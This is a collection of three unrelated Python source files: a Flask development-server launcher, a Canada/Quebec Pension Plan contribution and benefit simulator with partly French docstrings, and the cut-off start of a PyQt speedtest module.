3294283
|
<gh_stars>0
"""
This script runs the FlaskDeepServer application using a development server.
"""
from os import environ
from FlaskDeepServer import app
import logging
if __name__ == '__main__':
    # Log everything from DEBUG up to log.log, truncating any previous run.
    log_settings = {
        'level': logging.DEBUG,
        'format': '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
        'datefmt': '%a, %d %b %Y %H:%M:%S',
        'filename': 'log.log',
        'filemode': 'w',
    }
    logging.basicConfig(**log_settings)
    # Development server: listen on all interfaces, port 8888.
    app.run('0.0.0.0', 8888)
|
StarcoderdataPython
|
3339315
|
import numpy as np
import operator
from enum import Enum
import pandas as pd
from os import path
class record:
    """One year of contribution information for an individual.

    Instances of this class are collected in the list *account.history*.
    Users will normally create entries through the *MakeContrib* method of
    the *account* class (below) rather than instantiating this directly.

    Parameters
    __________
    year : int
        calendar year of the entry
    earn : float
        pensionable earnings
    contrib : float
        contribution to the base plan
    contrib_s1 : float
        contribution to supplementary plan 1 (linked to the increase of the
        replacement rate)
    contrib_s2 : float
        contribution to supplementary plan 2 (linked to the increase of the
        earnings ceiling to 114% of the pre-reform YMPE)
    contrib_aut : float
        base-plan contribution on self-employment income
    contrib_aut_s1 : float
        supplementary plan 1 contribution on self-employment income
    contrib_aut_s2 : float
        supplementary plan 2 contribution on self-employment income
    kids : bool
        presence of children under age 7 (True only for the person eligible
        for the child-rearing dropout); default=False
    disab : bool
        disability benefit (not currently modelled) if True, retirement
        benefit if False; default=False
    """

    # Defaults normalized to 0.0 so every monetary field is a float.
    def __init__(self, year, earn=0.0, contrib=0.0, contrib_s1=0.0, contrib_s2=0.0,
                 contrib_aut=0.0, contrib_aut_s1=0.0, contrib_aut_s2=0.0, kids=False, disab=False):
        self.year = year
        self.earn = earn
        self.contrib = contrib
        self.contrib_s1 = contrib_s1
        self.contrib_s2 = contrib_s2
        self.contrib_aut = contrib_aut
        self.contrib_aut_s1 = contrib_aut_s1
        self.contrib_aut_s2 = contrib_aut_s2
        self.kids = kids
        self.disab = disab
class rules:
    """Parameter tables and accessors for the CPP and QPP rules.

    An instance loads either the QPP parameters (qpp=True) or the CPP
    parameters (qpp=False) from params/qpp_history.xlsx or
    params/cpp_history.xlsx.  Beyond the last tabulated year, most
    accessors return the last tabulated value; benefit indexation then
    uses *cpi* and YMPE growth uses *wgr*.  To get a parameter for a
    given year, call the matching method: *rules.<param>(year)*.

    All contribution rates are modelled separately because the different
    contribution components receive different tax treatments.

    Parameters
    __________
    qpp : bool
        True to load the QPP parameters, False for the CPP; default=False

    Attributes
    __________
    cpi : float
        annual indexation rate of benefits in payment
    wgr : float
        annual growth rate of the YMPE
    lastyear : int
        last year whose YMPE comes from the parameter file; *wgr* applies
        from lastyear + 1 on
    indexation : numpy.ndarray
        precomputed benefit-indexation factors between any two years from
        1966 to 2100
    """

    def __init__(self, qpp=False):
        # Column names of the yearly parameter file.
        ynames = ['year', 'ympe', 'exempt', 'worker', 'employer', 'selfemp', 'ca', 'arf', 'drc',
                  'nympe', 'reprate', 'droprate', 'pu1', 'pu2', 'pu3', 'pu4', 'survmax60',
                  'survmax65', 'survage1', 'survage2', 'survrate1', 'survrate2', 'era', 'nra',
                  'lra', 'supp', 'disab_rate', 'disab_base', 'cola', 'ympe_s2', 'worker_s1',
                  'employer_s1', 'worker_s2', 'employer_s2', 'selfemp_s1', 'selfemp_s2',
                  'reprate_s1', 'reprate_s2', 'supp_s1', 'supp_s2']
        self.qpp = qpp
        self.start = 1966      # first year of the plans
        self.start_s1 = 2019   # first year of supplementary plan 1
        self.start_s2 = 2024   # first year of supplementary plan 2
        params = path.join(path.dirname(__file__), 'params')
        if self.qpp:
            self.yrspars = pd.read_excel(params + '/qpp_history.xlsx', names=ynames)
        else:
            # The CPP file has no income-tested adjustment ('ca') column.
            ynames.remove('ca')
            self.yrspars = pd.read_excel(params + '/cpp_history.xlsx', names=ynames)
        self.stop = np.max(self.yrspars['year'].values)
        self.yrspars = self.yrspars.set_index('year')
        self.cpi = 0.02
        self.wgr = 0.03
        self.lastyear = 2021
        # Precompute indexation factors for years 1966..2100:
        # row a, column b holds the product of (1 + cola) over the years
        # strictly after a up to and including b (1 on and below the diagonal).
        self.indexation = np.ones((2100-1966, 2100-1966))
        ones_lower = np.tril(self.indexation)
        for y in range(2100-1966):
            self.indexation[:, y] = self.indexation[:, y] + self.cola(1966+y)
        self.indexation = np.cumprod((np.triu(self.indexation)
                                      - np.diag(np.diag(self.indexation))
                                      + ones_lower), axis=1)

    def _par(self, name, year):
        """Tabulated value of *name* for *year*, frozen at the last tabulated year."""
        return self.yrspars.loc[min(year, self.stop), name]

    def ympe(self, year):
        """Basic year's maximum pensionable earnings (YMPE); grown at *wgr* past *lastyear*."""
        if year > self.lastyear:
            return self.yrspars.loc[self.lastyear, 'ympe'] * (1.0 + self.wgr) ** (year - self.lastyear)
        return self.yrspars.loc[year, 'ympe']

    def ympe_s2(self, year):
        """Supplementary plan 2 earnings ceiling: basic YMPE times the tabulated s2 factor (0 before 2024)."""
        return self.ympe(year) * self._par('ympe_s2', year)

    def exempt(self, year):
        """Basic exemption on contributory earnings (held at its last nominal value)."""
        return self._par('exempt', year)

    def worktax(self, year):
        """Employee contribution rate, base plan."""
        return self._par('worker', year)

    def worktax_s1(self, year):
        """Employee contribution rate, supplementary plan 1."""
        return self._par('worker_s1', year)

    def worktax_s2(self, year):
        """Employee contribution rate, supplementary plan 2."""
        return self._par('worker_s2', year)

    def empltax(self, year):
        """Employer contribution rate, base plan."""
        return self._par('employer', year)

    def empltax_s1(self, year):
        """Employer contribution rate, supplementary plan 1."""
        return self._par('employer_s1', year)

    def empltax_s2(self, year):
        """Employer contribution rate, supplementary plan 2."""
        return self._par('employer_s2', year)

    def selftax(self, year):
        """Self-employment contribution rate, base plan."""
        return self._par('selfemp', year)

    def selftax_s1(self, year):
        """Self-employment contribution rate, supplementary plan 1."""
        return self._par('selfemp_s1', year)

    def selftax_s2(self, year):
        """Self-employment contribution rate, supplementary plan 2."""
        return self._par('selfemp_s2', year)

    def ca(self, year):
        """QPP income-tested adjustment factor of the early-retirement reduction (0 under the CPP)."""
        return self._par('ca', year) if self.qpp else 0.0

    def arf(self, year):
        """Benefit reduction rate for take-up before the normal retirement age."""
        return self._par('arf', year)

    def drc(self, year):
        """Benefit increase rate for take-up after the normal retirement age."""
        return self._par('drc', year)

    def nympe(self, year):
        """Number of years used to compute the average YMPE."""
        return self._par('nympe', year)

    def reprate(self, year):
        """Replacement rate, base plan."""
        return self._par('reprate', year)

    def reprate_s1(self, year):
        """Replacement rate, supplementary plan 1."""
        return self._par('reprate_s1', year)

    def reprate_s2(self, year):
        """Replacement rate, supplementary plan 2."""
        return self._par('reprate_s2', year)

    def droprate(self, year):
        """Share of years excluded from the retirement benefit calculation."""
        return self._par('droprate', year)

    def supp(self, year):
        """Post-retirement benefit accrual rate for beneficiaries who keep working, base plan."""
        return self._par('supp', year)

    def supp_s1(self, year):
        """Post-retirement benefit accrual rate, supplementary plan 1."""
        return self._par('supp_s1', year)

    def supp_s2(self, year):
        """Post-retirement benefit accrual rate, supplementary plan 2."""
        return self._par('supp_s2', year)

    def era(self, year):
        """Earliest age at which the retirement benefit can start."""
        return self._par('era', year)

    def nra(self, year):
        """Normal retirement age."""
        return self._par('nra', year)

    def disab_rate(self, year):
        """Disability benefit rate (disability benefits are not currently modelled)."""
        return self._par('disab_rate', year)

    def disab_base(self, year):
        """Disability benefit base amount (disability benefits are not currently modelled)."""
        return self._par('disab_base', year)

    def cola(self, year):
        """Annual indexation rate of benefits in payment (*cpi* past the last tabulated year)."""
        if year > self.stop:
            return self.cpi
        return self.yrspars.loc[year, 'cola']

    def gIndexation(self, start, stop):
        """Cumulative benefit-indexation factor between years *start* and *stop*."""
        return self.indexation[start-self.start][stop-self.start]

    def max_benefit(self, year):
        """Maximum possible monthly benefit for a take-up in *year*.

        Based on the average YMPE of the 5 preceding years (bounded below
        by 1966); used by the QPP income-tested reduction for individuals
        who start their retirement benefit early.
        """
        return np.mean([self.ympe(x) for x in [max(year-x, 1966) for x in range(5)]]) * self.reprate(year) / 12
class account:
"""
Classe principale regroupant l'information sur un individu et comprenant les fonctions de calcul.
Principale interface avec le simulateur. Chaque individu simulé doit avoir une instance de cette classe.
Parameters
__________
byear : int
année de naissance
rules : rules
une instance de la classe rules
"""
def __init__(self, byear, rules=None):
    """Set up an empty contribution account for someone born in *byear*.

    The contribution history covers ages 18 to 69 inclusive; every
    benefit amount starts at zero and no claim has been made yet.
    """
    self.byear = byear
    self.rules = rules
    # Not claimed yet: no claim age, not receiving benefits.
    self.claimage = None
    self.receiving = False
    # One empty record per year from age 18 up to (but excluding) age 70.
    self.history = [record(y) for y in range(byear + 18, byear + 70)]
    # Contribution-year counters, set when the benefit is claimed.
    self.ncontrib = 0
    self.ncontrib_s1 = 0
    self.ncontrib_s2 = 0
    # Average monthly pensionable earnings, one per plan.
    self.ampe = 0.0
    self.ampe_s1 = 0.0
    self.ampe_s2 = 0.0
    # Benefit amounts, one per plan.
    self.benefit = 0.0
    self.benefit_s1 = 0.0
    self.benefit_s2 = 0.0
    # Post-retirement benefit slots (11 entries, indexed from age 60 in CalcPRB).
    self.prb = [0] * 11
    self.prb_s1 = [0] * 11
    self.prb_s2 = [0] * 11
    self.cqppcontrib = 0.0
def MakeContrib(self,year,earn,earn_aut=0,kids=False):
    """Add one year of contributions (a *record* instance) to the history.

    Splits employment and self-employment earnings into contributory
    amounts for the base plan and the two supplementary plans, applies
    the basic exemption, and stores the resulting record in the slot
    for the individual's age.

    Parameters
    __________
    year : int
        contribution year
    earn : float
        contributory employment earnings
    earn_aut : float
        contributory self-employment earnings; default=0
    kids : bool
        presence of children under age 7 (True only for the person
        eligible for the child-rearing dropout); default=False
    """
    # No contributions before the plan exists.
    if year>=self.rules.start:
        if earn>=self.rules.ympe(year):
            # Employment earnings alone reach the ceiling: contributory base
            # is YMPE minus the exemption; no room left for self-employment income.
            taxable = self.rules.ympe(year)-self.rules.exempt(year)
            taxable_aut = 0
        elif (earn+earn_aut) >=self.rules.ympe(year):
            # Combined earnings reach the ceiling: employment income counts
            # first, self-employment income fills the remainder up to the YMPE.
            if earn >= self.rules.exempt(year):
                taxable = earn-self.rules.exempt(year)
                taxable_aut = self.rules.ympe(year)-earn
            else :
                taxable = 0
                taxable_aut = self.rules.ympe(year) - self.rules.exempt(year)
        else:
            # Both below the ceiling: apply the exemption to employment
            # income first, then to self-employment income.
            taxable = earn
            taxable_aut = earn_aut
            if taxable >=self.rules.exempt(year):
                taxable -= self.rules.exempt(year)
            elif taxable + taxable_aut >=self.rules.exempt(year):
                taxable_aut -= (self.rules.exempt(year)-taxable)
                taxable = 0.0
            else:
                taxable = 0.0
                taxable_aut = 0.0
        # Base-plan and s1 contributions.  The factor 2 on self-employment
        # income presumably covers both employee and employer shares — TODO confirm.
        contrib = self.rules.worktax(year) * taxable
        contrib_aut = self.rules.worktax(year) * taxable_aut * 2
        contrib_s1 = self.rules.worktax_s1(year) * taxable
        contrib_aut_s1 = self.rules.worktax_s1(year) * taxable_aut * 2
        # s2 contributory earnings: the slice between the basic YMPE and the s2 ceiling.
        taxable_s2 = np.min( [np.max([earn-self.rules.ympe(year),0.0]) , (self.rules.ympe_s2(year)-self.rules.ympe(year))])
        if taxable_s2>0.0:
            if taxable_s2<(self.rules.ympe_s2(year)-self.rules.ympe(year)):
                # Self-employment income can fill whatever s2 room employment income left.
                taxable_aut_s2 = np.min([taxable_aut,(self.rules.ympe_s2(year)-self.rules.ympe(year))-taxable_s2])
            else :
                taxable_aut_s2 = 0.0
        else:
            taxable_aut_s2 = 0.0
        contrib_s2 = self.rules.worktax_s2(year) * taxable_s2
        contrib_aut_s2 = self.rules.worktax_s2(year) * taxable_aut_s2 * 2
        # NOTE(review): only the employee base and s2 contributions are summed
        # here (s1 and self-employment amounts excluded) — confirm intended.
        self.cqppcontrib = contrib +contrib_s2
        # History slot for this year (history starts at age 18).
        index = self.gAge(year)-18
        self.history[index]= record(year,earn=earn+earn_aut,contrib = contrib,contrib_s1 = contrib_s1,contrib_s2=contrib_s2,
                contrib_aut = contrib_aut,contrib_aut_s1 = contrib_aut_s1,contrib_aut_s2=contrib_aut_s2,kids=kids)
        # If benefits are already in payment, the new contribution generates
        # a post-retirement benefit.
        if self.claimage!=None:
            self.CalcPRB(year,taxable,taxable_s2,earn)
def ClaimCPP(self,year):
"""
Effectue la demande de débuter les prestations et appelle les fonctions *CalcAMPE* et *CalcBenefit* (voir plus bas).
Parameters
__________
year : int
année de cotisation
"""
currage = self.gAge(year)
if self.claimage!=None:
print('already claimed at ',self.claimage,' ...')
else :
if currage >= self.rules.era(year):
self.ncontrib = np.min([currage - 18,year-1966])
self.ncontrib_s1 = np.max([np.min([currage - 18,year-self.rules.start_s1]),0])
self.ncontrib_s2 = np.max([np.min([currage - 18,year-self.rules.start_s2]),0])
self.claimage = currage
self.receiving = True
self.CalcAMPE(year)
self.CalcBenefit(year)
else :
print('not yet eligible...')
def gAge(self,year):
"""
Retourne l'âge de l'individu dans une année donnée.
Parameters
__________
year : int
année
Return
______
int
Âge.
"""
return year - self.byear
def gYear(self,age):
"""
Retourne l'année pour un âge donné.
Parameters
__________
year : int
Âge
Return
______
int
Année.
"""
return self.byear + age
def CalcAMPE(self,year):
    """Compute the average monthly pensionable earnings (AMPE) per plan.

    Earnings are taken as a proportion of each year's YMPE and scaled by
    the average YMPE of the last *nympe* years.  Dropout provisions
    (disability, child rearing, general dropout) zero out the lowest
    years before averaging.  Results are stored in *ampe*, *ampe_s1* and
    *ampe_s2*.

    Parameters
    __________
    year : int
        year in which benefits start
    """
    # Contribution window: from age 18 (or plan start) to age 70 (or the claim year).
    yr18 = np.max([self.gYear(18),self.rules.start])
    yr70 = np.min([self.gYear(70),year])
    nyrs = yr70-yr18
    yr18_s2 = np.max([self.gYear(18),self.rules.start_s2])
    # NOTE(review): nyrs_s2 is built as a one-element list and never used below.
    nyrs_s2 = [np.max([(yr70-yr18_s2),0])]
    # First usable slot of the history (the history starts at age 18).
    index = np.max([self.gAge(1966)-18,0])
    yrs = [self.history[p].year for p in range(index,index+self.ncontrib)]
    # NOTE(review): yrs_s2 is computed but never used below.
    yrs_s2 = [self.history[p].year for p in range(index,index+self.ncontrib_s2)]
    # Per-year parameters aligned with the contribution years.
    ympe = [self.rules.ympe(i) for i in yrs]
    ympe_s2 = [self.rules.ympe_s2(i) for i in yrs]
    worktax_s1 = [self.rules.worktax_s1(i) for i in yrs]
    exempt = [self.rules.exempt(i) for i in yrs]
    kids = [self.history[p].kids for p in range(index,index+self.ncontrib)]
    disab = [self.history[p].disab for p in range(index,index+self.ncontrib)]
    earn = [self.history[p].earn for p in range(index,index+self.ncontrib)]
    nympe = self.rules.nympe(year)
    # Unadjusted pensionable earnings: capped at the YMPE, zeroed below the exemption.
    self.upe = [np.min([earn[i],ympe[i]]) for i in range(self.ncontrib)]
    self.upe = [np.where(self.upe[i]<exempt[i],0.0,self.upe[i]) for i in range(self.ncontrib)]
    # s2 earnings: the slice between the basic YMPE and the s2 ceiling
    # (non-zero only once plan s2 starts in 2024).
    self.upe_s2 = [np.max([np.min([earn[i]-ympe[i],ympe_s2[i]-ympe[i]]),0.0]) for i in range(self.ncontrib)]
    # Average YMPE over the last nympe years.
    avgympe = np.mean([self.rules.ympe(i) for i in range(year-nympe+1,year+1)])
    # Adjusted pensionable earnings: share of the year's YMPE times the average YMPE.
    ape = [self.upe[i]/ympe[i]*avgympe for i in range(self.ncontrib)]
    ape_s1 = [self.upe[i]/ympe[i] * avgympe * worktax_s1[i]*100 for i in range(self.ncontrib)]
    ape_s2 = [self.upe_s2[i]/ympe[i]*avgympe for i in range(self.ncontrib)]
    # Disability dropout: zero-earnings years while disabled are flagged.
    # NOTE(review): ndrop/dropped are reset by the child-rearing block below,
    # so this base-plan disability pass has no effect — confirm intended.
    ndrop = 0
    dropped = np.full(self.ncontrib, False)
    for i in range(self.ncontrib):
        if (self.upe[i]==0.0 and disab[i]==True):
            dropped[i] = True
            ndrop +=1
    # Disability dropout for supplementary plan 1.
    ndrop_s1 = 0
    dropped_s1 = np.full(self.ncontrib, False)
    for i in range(self.ncontrib):
        if year>=self.rules.start_s1 and (self.upe[i]==0.0 and disab[i]==True):
            dropped_s1[i] = True
            ndrop_s1 +=1
    # Disability dropout for supplementary plan 2.
    ndrop_s2 = 0
    dropped_s2 = np.full(self.ncontrib, False)
    for i in range(self.ncontrib):
        if year>=self.rules.start_s2 and (self.upe_s2[i]==0.0 and disab[i]==True):
            dropped_s2[i] = True
            ndrop_s2 +=1
    # Child-rearing dropout, step 1 (CRD01): zero-earnings years with young children.
    ndrop = 0
    dropped = np.full(self.ncontrib, False)
    for i in range(self.ncontrib):
        if (self.upe[i]==0.0 and kids[i]==True):
            dropped[i] = True
            ndrop +=1
    # Average APE over the non-dropped years.
    avgape = np.sum(ape)/(nyrs - ndrop)
    avgape_s2 = np.sum(ape_s2)/40
    # Child-rearing dropout, step 2 (CRD02): below-average years with young children.
    for i in range(self.ncontrib):
        if (ape[i]<avgape and kids[i]==True):
            ape[i] = 0.0
            dropped[i] = True
            ndrop +=1
    # TODO: add a provision for working past age 65.
    # General dropout: remove the droprate share of the lowest remaining years.
    gdrop = int(np.ceil(self.rules.droprate(year)*(self.ncontrib - ndrop)))
    apef = [ape[i] for i in range(self.ncontrib) if dropped[i]==False]
    ixf = np.asarray(apef).argsort()[0:gdrop]
    yrsf = [yrs[i] for i in range(self.ncontrib) if dropped[i]==False]
    yrstodrop = [yrsf[i] for i in ixf]
    for i in range(self.ncontrib):
        if (yrs[i] in yrstodrop and gdrop!=0):
            ape[i] = 0
            dropped[i] = True
            ndrop +=1
            gdrop -=1
    # Base plan: monthly average over the retained years.
    self.ampe = (1/12)*np.sum(ape)/(nyrs - ndrop)
    # TODO (translated from French): revisit the indices — this part does not
    # yet do exactly what it should; not serious for now because by default
    # gdrop_s1 = 0 before 2059 and gdrop_s2 = 0 before 2064.
    gdrop_s1 = int(np.max([self.ncontrib_s1-40,0.0]))
    apef_s1 = [ape_s1[i] for i in range(self.ncontrib) if dropped_s1[i]==False]
    ixf_s1 = np.asarray(apef_s1).argsort()[0:gdrop_s1]
    yrsf_s1 = [yrs[i] for i in range(self.ncontrib) if dropped_s1[i]==False]
    yrstodrop_s1 = [yrsf_s1[i] for i in ixf_s1]
    for i in range(self.ncontrib):
        if (yrs[i] in yrstodrop_s1 and gdrop_s1!=0):
            ape_s1[i] = 0
            dropped_s1[i] = True
            ndrop_s1 +=1
            gdrop_s1 -=1
    # Supplementary plan 1: monthly average over a fixed 40 years.
    self.ampe_s1 = (1/12)*np.sum(ape_s1)/40
    gdrop_s2 = int(np.max([self.ncontrib_s2-40,0.0]))
    apef_s2 = [ape_s2[i] for i in range(self.ncontrib) if dropped_s2[i]==False]
    ixf_s2 = np.asarray(apef_s2).argsort()[0:gdrop_s2]
    yrsf_s2 = [yrs[i] for i in range(self.ncontrib) if dropped_s2[i]==False]
    yrstodrop_s2 = [yrsf_s2[i] for i in ixf_s2]
    for i in range(self.ncontrib):
        if (yrs[i] in yrstodrop_s2 and gdrop_s2!=0):
            ape_s2[i] = 0
            dropped_s2[i] = True
            ndrop_s2 +=1
            gdrop_s2 -=1
    # Supplementary plan 2: monthly average over a fixed 40 years.
    self.ampe_s2 = (1/12)*np.sum(ape_s2)/40
    def CalcBenefit(self,year):
        """
        Compute the retirement benefit (base plan, supplemental plan 1 and
        supplemental plan 2), using the AMPEs computed by *CalcAMPE* and the
        plan-rule functions.

        Parameters
        __________
        year : int
            first year benefits are paid
        """
        if self.receiving==True:
            if (self.gAge(year)==self.claimage):
                # Plan parameters in the claim year.
                nra = self.rules.nra(year)    # normal retirement age
                ca = self.rules.ca(year)      # QPP-specific adjustment coefficient
                arf = self.rules.arf(year)    # early-claim (actuarial) reduction factor
                drc = self.rules.drc(year)    # delayed retirement credit
                age = self.gAge(year)
                # Base benefit = replacement rate x average monthly pensionable earnings.
                self.benefit = self.rules.reprate(year) * self.ampe
                self.benefit_s1 = self.rules.reprate_s1(year) * self.ampe_s1
                self.benefit_s2 = self.rules.reprate_s2(year) * self.ampe_s2
                if (age<nra):
                    # Early claiming: reduce per year before the normal retirement age.
                    # NOTE(review): the s1/s2 adjustment factors reuse self.benefit
                    # (base plan) rather than benefit_s1/benefit_s2 — confirm intended.
                    self.benefit *= 1.0+(arf+int(self.rules.qpp)*ca*self.benefit/self.rules.max_benefit(year))*(age-nra)
                    self.benefit_s1 *= 1.0+(arf+int(self.rules.qpp)*ca*self.benefit/self.rules.max_benefit(year))*(age-nra)
                    self.benefit_s2 *= 1.0+(arf+int(self.rules.qpp)*ca*self.benefit/self.rules.max_benefit(year))*(age-nra)
                else :
                    # Late claiming: apply the delayed retirement credit per year past NRA.
                    self.benefit *= 1.0+drc*(age-nra)
                    self.benefit_s1 *= 1.0+drc*(age-nra)
                    self.benefit_s2 *= 1.0+drc*(age-nra)
        else:
            # Not receiving: no benefit from any of the three plans.
            self.benefit = 0.0
            self.benefit_s1 = 0.0
            self.benefit_s2 = 0.0
def CalcPRB(self,year,taxable,taxable_s2,earn):
"""
Calcule la prestation post-retraite lorsqu'une cotisation a été faite après le début des prestations.
Parameters
__________
year : int
année de la cotisation
taxable : float
montant cotisable pour le régime de base et le régime supplémentaire 1
taxable_s2 : float
montant cotisable pour le régime supplémentaire 2
earn : float
gains admissibles dans l'année précédente
"""
if self.rules.qpp:
if year>=2014:
self.prb[self.gAge(year)-60+1] = (self.prb[self.gAge(year)-60]*(1+self.rules.cola(year))
+ taxable*self.rules.supp(year)/12)
self.prb_s1[self.gAge(year)-60+1] = (self.prb_s1[self.gAge(year)-60]*(1+self.rules.cola(year))+
taxable*self.rules.worktax_s1(year)*100*self.rules.supp_s1(year)/12)
self.prb_s2[self.gAge(year)-60+1] = (self.prb_s2[self.gAge(year)-60+1] +
taxable_s2*self.rules.worktax_s2(year)*100*self.rules.supp_s2(year)/12)
if self.gAge(year)<69:
for index in range(self.gAge(year)-60+2,11):
self.prb[index] = self.prb[index-1]*(1+self.rules.cola(year+index))
self.prb_s1[index] = self.prb_s1[index-1]*(1+self.rules.cola(year+index))
self.prb_s2[index] = self.prb_s2[index-1]*(1+self.rules.cola(year+index))
else:
if year>=2014 & self.gAge(year)<70:
nra = self.rules.nra(year)
arf = self.rules.arf(year)
drc = self.rules.drc(year)
age = self.gAge(year)
upe = np.min([earn,self.rules.ympe(year)])
if upe<self.rules.exempt(year) : upe = 0
#upe_s2 Need to start only in 2024
upe_s2 = np.max([np.min([earn-self.rules.ympe(year),self.rules.ympe_s2(year)-self.rules.ympe(year)]),0.0])
#PRB base
prb = upe/self.rules.ympe(year) * self.rules.ympe(year+1)*self.rules.supp(year)
# PRB S1
prb_s1 = upe/self.rules.ympe(year) * self.rules.ympe(year+1)*self.rules.worktax_s1(year)*100*self.rules.supp_s1(year)
#PRB S2
if upe_s2>0:
prb_s2 = upe_s2/(self.rules.ympe_s2(year)-self.rules.ympe(year))*(self.rules.ympe_s2(year+1)-self.rules.ympe(year+1)) * self.rules.supp_s1(year)
#Ajustment factor
if (age<nra):
self.prb[self.gAge(year)-60+1] = self.prb[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+arf*(age-nra)) * prb/12
self.prb_s1[self.gAge(year)-60+1] = self.prb_s1[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+arf*(age-nra)) * prb_s1/12
self.prb_s2[self.gAge(year)-60+1] = self.prb_s2[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+arf*(age-nra)) * prb_s2/12
else :
self.prb[self.gAge(year)-60+1] = self.prb[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+drc*(age-nra)) * prb/12
self.prb_s1[self.gAge(year)-60+1] = self.prb_s1[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+drc*(age-nra)) * prb_s1/12
self.prb_s2[self.gAge(year)-60+1] = self.prb_s2[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+drc*(age-nra)) * prb_s2/12
if self.gAge(year)<69:
for index in range(self.gAge(year)-60+2,11):
self.prb[index] = self.prb[index-1]*(1+self.rules.cola(year+index))
self.prb_s1[index] = self.prb_s1[index-1]*(1+self.rules.cola(year+index))
self.prb_s2[index] = self.prb_s2[index-1]*(1+self.rules.cola(year+index))
def gBenefit(self,year):
"""
Retourne le montant de la prestation du régime de base pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Prestation.
"""
if self.claimage :
claimyear = self.gYear(self.claimage)
return self.benefit * self.rules.gIndexation(claimyear,year)
else :
return self.benefit
def gBenefit_s1(self,year):
"""
Retourne le montant de la prestation du régime supplémentaire 1 pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Prestation.
"""
if self.claimage :
claimyear = self.gYear(self.claimage)
return self.benefit_s1 * self.rules.gIndexation(claimyear,year)
else :
return self.benefit_s1
def gBenefit_s2(self,year):
"""
Retourne le montant de la prestation du régime supplémentaire 2 pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Prestation.
"""
if self.claimage :
claimyear = self.gYear(self.claimage)
return self.benefit_s2 * self.rules.gIndexation(claimyear,year)
else :
return self.benefit_s2
def gPRB(self,year):
"""
Retourne le montant de la prestion post-retraite du régime de base pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Montant de la prestion post-retraite.
"""
if self.gAge(year)<60 :
return 0.0
elif self.gAge(year)<self.gAge(year)<=70:
return self.prb[self.gAge(year)-60]
else :
return self.prb[10]*self.rules.gIndexation(self.gYear(70),year)
def gPRB_s1(self,year):
"""
Retourne le montant de la prestion post-retraite du régime supplémentaire 1 pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Montant de la prestion post-retraite.
"""
if self.gAge(year)<60 :
return 0.0
elif self.gAge(year)<self.gAge(year)<=70:
return self.prb_s1[self.gAge(year)-60]
else :
return self.prb_s1[10]*self.rules.gIndexation(self.gYear(70),year)
def gPRB_s2(self,year):
"""
Retourne le montant de la prestion post-retraite du régime supplémentaire 2 pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Montant de la prestion post-retraite.
"""
if self.gAge(year)<60 :
return 0.0
elif self.gAge(year)<self.gAge(year)<=70:
return self.prb_s2[self.gAge(year)-60]
else :
return self.prb_s2[10]*self.rules.gIndexation(self.gYear(70),year)
def RunCase(self,claimage=65):
yr18 = np.max([self.gYear(18),self.rules.start])
start_age = self.gAge(yr18)
for a in range(start_age,self.retage):
if a == claimage:
self.ClaimCPP(self.gYear(claimage))
yr = self.gYear(a)
self.MakeContrib(yr,earn=self.rules.ympe(yr)*self.ratio_list[a-start_age], kids = self.kids_list[a-start_age])
if self.retage < claimage :
for a in range(self.retage,claimage):
yr = self.gYear(a)
self.MakeContrib(yr,earn=0)
if self.claimage==None: self.ClaimCPP(self.gYear(claimage))
return
    def SetHistory_ratio(self,retage=60, **kwargs):
        """
        Build the per-age list of earnings ratios (fraction of the YMPE earned
        each year) from age 18 / plan start up to *retage*.

        Parameters
        __________
        retage : int
            retirement age (default 60)
        **kwargs :
            each value is a dict whose first item is the ratio and whose
            second item is the number of years it applies for
        """
        self.retage = retage
        yr18 = np.max([self.gYear(18),self.rules.start])
        start_age = self.gAge(yr18)
        nyears = self.retage - start_age
        # Default: full YMPE every year.
        self.ratio_list = [1]*nyears
        nargs = len(kwargs)
        niter=0
        for key,val in kwargs.items():
            temp_list= [x for x in val.values()]
            # NOTE(review): the window starts at `niter` and spans temp_list[1]
            # years, but `niter` only advances by 1 per kwarg — successive
            # windows overlap unless each spans exactly one year. Confirm
            # whether `niter += temp_list[1]` was intended.
            for i in np.arange(niter,niter+temp_list[1]):
                self.ratio_list[i] = temp_list[0]
            niter += 1
        return
def SetHistory_fam(self, claimage = 65, age_birth=[]):
self.age_birth = age_birth
yr18 = np.max([self.gYear(18),self.rules.start])
start_age = self.gAge(yr18)
nyears = claimage - start_age
self.kids_list = [False]*nyears
for x in range(len(age_birth)):
indice = age_birth[x] - start_age
if age_birth[x]>=start_age and age_birth[x]<= 50:
for yr in range(7):
self.kids_list[indice+yr] = True
if age_birth[x]>=start_age and age_birth[x]>50:
print("Please check age at birth")
else :
years_deduc = 7 - (start_age - age_birth[x])
for yr in range(years_deduc):
self.kids_list[yr] = True
def ResetCase(self):
"""
Réinitialise l'instance de la classe *account*.
"""
self.claimage = None
self.history = [record(yr) for yr in range(self.byear+18,self.byear+70,1)]
self.ncontrib = 0
self.ampe = 0.0
self.receiving = False
self.benefit = 0.0
|
StarcoderdataPython
|
117594
|
import asyncio
# import spec_checker.modules.fast_speedtest as fast
from spec_checker.modules.speedtest_net import Speedtest
from spec_checker.modules.utilities import truncate
# from main import speed_stage
from PyQt5.QtCore import QObject, QThread, pyqtSignal, QTimer
from asyncqt import asyncSlot
import asyncio  # NOTE(review): duplicate of the import above; harmless but redundant.
import pythoncom
# Initialise COM for this thread (required on Windows before COM calls).
pythoncom.CoInitialize()
# Module-level progress indicator used by the commented-out test stages below.
speed_stage = 0
class SpeedtestRecord:
    """Container for the results of one speedtest run.

    Attributes mirror the speedtest result fields; `complete` flags whether
    the test finished successfully.
    """
    def __init__(self, download_speed=None, upload_speed=None, ping=None, date=None, time=None, client=None,
                 isp=None, ip=None, share=None, complete=False):
        self.download_speed = download_speed  # Mbps
        self.upload_speed = upload_speed      # Mbps
        self.ping = ping                      # latency in ms
        self.date = date
        self.time = time
        self.client = client
        self.isp = isp
        self.ip = ip
        self.share = share                    # result share link
